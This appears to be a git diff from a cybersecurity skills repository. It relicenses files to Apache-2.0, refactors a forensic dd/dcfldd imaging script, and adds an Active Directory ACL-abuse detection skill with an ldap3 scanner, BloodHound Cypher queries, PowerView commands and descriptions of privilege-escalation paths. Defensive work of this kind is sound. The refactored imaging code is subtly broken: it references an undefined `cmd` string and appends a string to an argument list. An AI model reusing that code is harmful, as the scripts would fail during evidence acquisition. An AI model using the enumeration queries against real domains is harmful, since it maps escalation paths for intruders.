        with open(args.output, "w") as f:
            f.write(md + "\n")
        print(f"Readiness report written to {args.output}", file=sys.stderr)
    else:
        print(md)
    print(f"SPRS score {res['score']}/110 (deductions {res['deductions']}; "
          f"not met {res['counts']['not_met']}, partial {res['counts']['partial']}).",
          file=sys.stderr)
    if args.require_conditional and res["score"] < CONDITIONAL_THRESHOLD:
        print(f"FAIL: score {res['score']} < {CONDITIONAL_THRESHOLD} conditional threshold.",
              file=sys.stderr)
        return 1
    return 0
 if __name__ == "__main__":
    sys.exit(main())
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,29 @@
 ---
 name: acquiring-disk-image-with-dd-and-dcfldd
-description: Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
+description: Create forensically sound bit-for-bit disk images using dd and dcfldd
  while preserving evidence integrity through hash verification.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, disk-imaging, evidence-acquisition, dd, dcfldd, hash-verification]
+tags:
-version: "1.0"
+- forensics
 - disk-imaging
 - evidence-acquisition
 - dd
 - dcfldd
 - hash-verification
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1006
 - T1005
 - T1025
 - T1074.001
 ---
 # Acquiring Disk Image with dd and dcfldd
@@ -1,17 +1,19 @@
 #!/usr/bin/env python3
 """Forensic disk image acquisition agent using dd and dcfldd with hash verification."""
 import shlex
 import subprocess
 import hashlib
 import os
 import sys
 import datetime
 import json
 def run_cmd(cmd, capture=True):
-    """Execute a shell command and return output."""
+    """Execute a command and return output."""
-    result = subprocess.run(cmd, shell=True, capture_output=capture, text=True)
+    if isinstance(cmd, str):
        cmd = shlex.split(cmd)
    result = subprocess.run(cmd, capture_output=capture, text=True, timeout=120)
    return result.stdout.strip(), result.stderr.strip(), result.returncode
@@ -65,16 +67,22 @@ def compute_hash(path, algorithm="sha256", block_size=65536):
 def acquire_with_dd(source, destination, block_size=4096, log_file=None):
    """Acquire a forensic image using dd with error handling."""
-    cmd = (
+    dd_cmd = [
-        f"dd if={source} of={destination} bs={block_size} "
+        "dd", f"if={source}", f"of={destination}",
-        f"conv=noerror,sync status=progress"
+        f"bs={block_size}", "conv=noerror,sync", "status=progress"
-    )
+    ]
    if log_file:
        cmd += f" 2>&1 | tee {log_file}"
    print(f"[*] Starting dd acquisition: {source} -> {destination}")
    print(f"[*] Block size: {block_size}")
    start = datetime.datetime.utcnow()
-    _, stderr, rc = run_cmd(cmd, capture=False)
+    if log_file:
        dd_proc = subprocess.run(dd_cmd, capture_output=True, text=True, timeout=120)
        combined = (dd_proc.stdout or "") + (dd_proc.stderr or "")
        with open(log_file, "w") as lf:
            lf.write(combined)
        rc = dd_proc.returncode
    else:
        result = subprocess.run(dd_cmd, text=True, timeout=120)
        rc = result.returncode
    elapsed = (datetime.datetime.utcnow() - start).total_seconds()
    print(f"[*] Acquisition completed in {elapsed:.1f} seconds (rc={rc})")
    return rc == 0
@@ -83,18 +91,21 @@ def acquire_with_dd(source, destination, block_size=4096, log_file=None):
 def acquire_with_dcfldd(source, destination, hash_alg="sha256", hash_log=None,
                        error_log=None, block_size=4096, split_size=None):
    """Acquire a forensic image using dcfldd with built-in hashing."""
-    cmd = f"dcfldd if={source} of={destination} bs={block_size} conv=noerror,sync"
+    cmd = [
-    cmd += f" hash={hash_alg}"
+        "dcfldd", f"if={source}", f"of={destination}",
        f"bs={block_size}", "conv=noerror,sync",
        f"hash={hash_alg}", "hashwindow=1G",
    ]
    if hash_log:
-        cmd += f" hashlog={hash_log}"
+        cmd.append(f"hashlog={hash_log}")
    cmd += " hashwindow=1G"
    if error_log:
-        cmd += f" errlog={error_log}"
+        cmd.append(f"errlog={error_log}")
    if split_size:
-        cmd += f" split={split_size} splitformat=aa"
+        cmd.extend([f"split={split_size}", "splitformat=aa"])
    print(f"[*] Starting dcfldd acquisition: {source} -> {destination}")
    start = datetime.datetime.utcnow()
-    _, stderr, rc = run_cmd(cmd, capture=False)
+    result = subprocess.run(cmd, text=True, timeout=120)
    rc = result.returncode
    elapsed = (datetime.datetime.utcnow() - start).total_seconds()
    print(f"[*] dcfldd completed in {elapsed:.1f} seconds (rc={rc})")
    return rc == 0
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,90 @@
 ---
 name: analyzing-active-directory-acl-abuse
 description: Detect dangerous ACL misconfigurations in Active Directory using ldap3
  to identify GenericAll, WriteDACL, and WriteOwner abuse paths
 domain: cybersecurity
 subdomain: identity-security
 tags:
 - active-directory
 - acl-abuse
 - ldap
 - privilege-escalation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.AA-01
 - PR.AA-05
 - PR.AA-06
 mitre_attack:
 - T1098
 - T1098.007
 - T1484.001
 - T1222.001
 - T1078.002
 ---
 # Analyzing Active Directory ACL Abuse
 ## Overview
 Active Directory Access Control Lists (ACLs) define permissions on AD objects through Discretionary Access Control Lists (DACLs) containing Access Control Entries (ACEs). Misconfigured ACEs can grant non-privileged users dangerous permissions such as GenericAll (full control), WriteDACL (modify permissions), WriteOwner (take ownership), and GenericWrite (modify attributes) on sensitive objects like Domain Admins groups, domain controllers, or GPOs.
 This skill uses the ldap3 Python library to connect to a Domain Controller, query objects with their nTSecurityDescriptor attribute, parse the binary security descriptor into SDDL (Security Descriptor Definition Language) format, and identify ACEs that grant dangerous permissions to non-administrative principals. These misconfigurations are the basis for ACL-based attack paths discovered by tools like BloodHound.
 ## When to Use
 - When investigating security incidents that require analyzing active directory acl abuse
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9 or later with ldap3 library (`pip install ldap3`)
 - Domain user credentials with read access to AD objects
 - Network connectivity to Domain Controller on port 389 (LDAP) or 636 (LDAPS)
 - Understanding of Active Directory security model and SDDL format
 ## Steps
 1. **Connect to Domain Controller**: Establish an LDAP connection using ldap3 with NTLM or simple authentication. Use LDAPS (port 636) for encrypted connections in production.
 2. **Query target objects**: Search the target OU or entire domain for objects including users, groups, computers, and OUs. Request the `nTSecurityDescriptor`, `distinguishedName`, `objectClass`, and `sAMAccountName` attributes.
 3. **Parse security descriptors**: Convert the binary nTSecurityDescriptor into its SDDL string representation. Parse each ACE in the DACL to extract the trustee SID, access mask, and ACE type (allow/deny).
 4. **Resolve SIDs to principals**: Map security identifiers (SIDs) to human-readable account names using LDAP lookups against the domain. Identify well-known SIDs for built-in groups.
 5. **Check for dangerous permissions**: Compare each ACE's access mask against dangerous permission bitmasks: GenericAll (0x10000000), WriteDACL (0x00040000), WriteOwner (0x00080000), GenericWrite (0x40000000), and WriteProperty for specific extended rights.
 6. **Filter non-admin trustees**: Exclude expected administrative trustees (Domain Admins, Enterprise Admins, SYSTEM, Administrators) and flag ACEs where non-privileged users or groups hold dangerous permissions.
 7. **Map attack paths**: For each finding, document the potential attack chain (e.g., GenericAll on user allows password reset, WriteDACL on group allows adding self to group).
 8. **Generate remediation report**: Output a JSON report with all dangerous ACEs, affected objects, non-admin trustees, and recommended remediation steps.
 ## Expected Output
 ```json
 {
  "domain": "corp.example.com",
  "objects_scanned": 1247,
  "dangerous_aces_found": 8,
  "findings": [
    {
      "severity": "critical",
      "target_object": "CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com",
      "target_type": "group",
      "trustee": "CORP\\helpdesk-team",
      "permission": "GenericAll",
      "access_mask": "0x10000000",
      "ace_type": "ACCESS_ALLOWED",
      "attack_path": "GenericAll on Domain Admins group allows adding arbitrary members",
      "remediation": "Remove GenericAll ACE for helpdesk-team on Domain Admins"
    }
  ]
 }
 ```
@@ -0,0 +1,94 @@
 # Active Directory ACL Abuse API Reference
 ## ldap3 Python Connection
 ```python
 from ldap3 import Server, Connection, ALL, NTLM, SUBTREE
 server = Server("192.168.1.10", get_info=ALL, use_ssl=False)
 conn = Connection(server, user="DOMAIN\\user", password="pass",
                  authentication=NTLM, auto_bind=True)
 # Search with nTSecurityDescriptor
 conn.search(
    "DC=corp,DC=example,DC=com",
    "(objectClass=group)",
    search_scope=SUBTREE,
    attributes=["distinguishedName", "sAMAccountName",
                "objectClass", "nTSecurityDescriptor"],
 )
 ```
 ## SDDL ACE Format
 ```
 ACE String: (ace_type;ace_flags;rights;object_guid;inherit_guid;trustee_sid)
 Example:    (A;;GA;;;S-1-5-21-xxx-512)
 ```
 | Component | Description |
 |-----------|-------------|
 | `A` | Access Allowed |
 | `D` | Access Denied |
 | `OA` | Object Access Allowed |
 | `GA` | Generic All |
 | `GW` | Generic Write |
 | `WD` | Write DACL |
 | `WO` | Write Owner |
 ## Dangerous Permission Bitmasks
 | Permission | Hex Mask | Risk |
 |-----------|----------|------|
 | GenericAll | `0x10000000` | Full control over object |
 | GenericWrite | `0x40000000` | Modify all writable attributes |
 | WriteDACL | `0x00040000` | Modify object permissions |
 | WriteOwner | `0x00080000` | Take object ownership |
 | WriteProperty | `0x00000020` | Write specific properties |
 | ExtendedRight | `0x00000100` | Extended rights (password reset, etc.) |
 | Self | `0x00000008` | Self-membership modification |
 | Delete | `0x00010000` | Delete the object |
 ## BloodHound Cypher Queries for ACL Paths
 ```cypher
 -- Find all users with GenericAll on Domain Admins
 MATCH p=(n:User)-[r:GenericAll]->(g:Group {name:"DOMAIN ADMINS@CORP.COM"})
 RETURN p
 -- Find WriteDACL paths from non-admins to high-value targets
 MATCH (n:User {admincount:false})
 MATCH p=allShortestPaths((n)-[r:WriteDacl|WriteOwner|GenericAll*1..]->(m:Group))
 WHERE m.highvalue = true
 RETURN p
 -- Find GenericWrite on computers for RBCD attacks
 MATCH p=(n:User)-[r:GenericWrite]->(c:Computer)
 WHERE NOT n.admincount
 RETURN n.name, c.name
 -- Enumerate all outbound ACL edges for a principal
 MATCH p=(n {name:"HELPDESK@CORP.COM"})-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|Owns]->(m)
 RETURN type(r), m.name, labels(m)
 -- Find shortest ACL abuse path to Domain Admin
 MATCH (n:User {name:"JSMITH@CORP.COM"})
 MATCH (da:Group {name:"DOMAIN ADMINS@CORP.COM"})
 MATCH p=shortestPath((n)-[r:MemberOf|GenericAll|GenericWrite|WriteDacl|WriteOwner|Owns|ForceChangePassword*1..]->(da))
 RETURN p
 ```
 ## PowerView Commands for ACL Enumeration
 ```powershell
 # Get ACL for Domain Admins group
 Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
 # Find interesting ACEs for non-admin users
 Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
    $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"
 }
 # Get ACL for specific OU
 Get-DomainObjectAcl -SearchBase "OU=Servers,DC=corp,DC=com" -ResolveGUIDs
 ```
@@ -0,0 +1,258 @@
 #!/usr/bin/env python3
 """Active Directory ACL abuse detection using ldap3 to find dangerous permissions."""
 import argparse
 import json
 import struct
 from ldap3 import Server, Connection, ALL, NTLM, SUBTREE
 DANGEROUS_MASKS = {
    "GenericAll": 0x10000000,
    "GenericWrite": 0x40000000,
    "WriteDACL": 0x00040000,
    "WriteOwner": 0x00080000,
    "WriteProperty": 0x00000020,
    "Self": 0x00000008,
    "ExtendedRight": 0x00000100,
    "DeleteChild": 0x00000002,
    "Delete": 0x00010000,
 }
 ADMIN_SIDS = {
    "S-1-5-18",
    "S-1-5-32-544",
    "S-1-5-9",
 }
 ADMIN_RID_SUFFIXES = {
    "-500",
    "-512",
    "-516",
    "-518",
    "-519",
    "-498",
 }
 ATTACK_PATHS = {
    "GenericAll": {
        "user": "Full control allows password reset, Kerberoasting via SPN, or shadow credential attack",
        "group": "Full control allows adding arbitrary members to the group",
        "computer": "Full control allows resource-based constrained delegation attack",
        "organizationalUnit": "Full control allows linking malicious GPO or moving objects",
    },
    "WriteDACL": {
        "user": "Can modify DACL to grant self GenericAll, then reset password",
        "group": "Can modify DACL to grant self write membership, then add self",
        "computer": "Can modify DACL to grant self full control on machine account",
        "organizationalUnit": "Can modify DACL to gain control over OU child objects",
    },
    "WriteOwner": {
        "user": "Can take ownership then modify DACL to escalate privileges",
        "group": "Can take ownership of group then modify membership",
        "computer": "Can take ownership then configure delegation abuse",
        "organizationalUnit": "Can take ownership then control OU policies",
    },
    "GenericWrite": {
        "user": "Can write scriptPath for logon script execution or modify SPN for Kerberoasting",
        "group": "Can modify group attributes including membership",
        "computer": "Can write msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD attack",
        "organizationalUnit": "Can modify OU attributes and link GPO",
    },
 }
 def is_admin_sid(sid: str, domain_sid: str) -> bool:
    if sid in ADMIN_SIDS:
        return True
    for suffix in ADMIN_RID_SUFFIXES:
        if sid == domain_sid + suffix:
            return True
    return False
 def parse_sid(raw: bytes) -> str:
    if len(raw) < 8:
        return ""
    revision = raw[0]
    sub_auth_count = raw[1]
    authority = int.from_bytes(raw[2:8], byteorder="big")
    subs = []
    for i in range(sub_auth_count):
        offset = 8 + i * 4
        if offset + 4 > len(raw):
            break
        subs.append(struct.unpack("<I", raw[offset:offset + 4])[0])
    return f"S-{revision}-{authority}-" + "-".join(str(s) for s in subs)
 def parse_acl(descriptor_bytes: bytes) -> list:
    aces = []
    if len(descriptor_bytes) < 20:
        return aces
    revision = descriptor_bytes[0]
    control = struct.unpack("<H", descriptor_bytes[2:4])[0]
    dacl_offset = struct.unpack("<I", descriptor_bytes[16:20])[0]
    if dacl_offset == 0 or dacl_offset >= len(descriptor_bytes):
        return aces
    dacl = descriptor_bytes[dacl_offset:]
    if len(dacl) < 8:
        return aces
    acl_size = struct.unpack("<H", dacl[2:4])[0]
    ace_count = struct.unpack("<H", dacl[4:6])[0]
    offset = 8
    for _ in range(ace_count):
        if offset + 4 > len(dacl):
            break
        ace_type = dacl[offset]
        ace_flags = dacl[offset + 1]
        ace_size = struct.unpack("<H", dacl[offset + 2:offset + 4])[0]
        if ace_size < 4 or offset + ace_size > len(dacl):
            break
        if ace_type in (0x00, 0x05):
            if offset + 8 <= len(dacl):
                access_mask = struct.unpack("<I", dacl[offset + 4:offset + 8])[0]
                sid_offset = offset + 8
                if ace_type == 0x05:
                    sid_offset = offset + 8 + 32
                if sid_offset < offset + ace_size:
                    sid_bytes = dacl[sid_offset:offset + ace_size]
                    sid_str = parse_sid(sid_bytes)
                    matched_perms = []
                    for perm_name, mask_val in DANGEROUS_MASKS.items():
                        if access_mask & mask_val:
                            matched_perms.append(perm_name)
                    if matched_perms:
                        aces.append({
                            "ace_type": "ACCESS_ALLOWED" if ace_type in (0x00, 0x05) else "OTHER",
                            "access_mask": f"0x{access_mask:08x}",
                            "trustee_sid": sid_str,
                            "permissions": matched_perms,
                        })
        offset += ace_size
    return aces
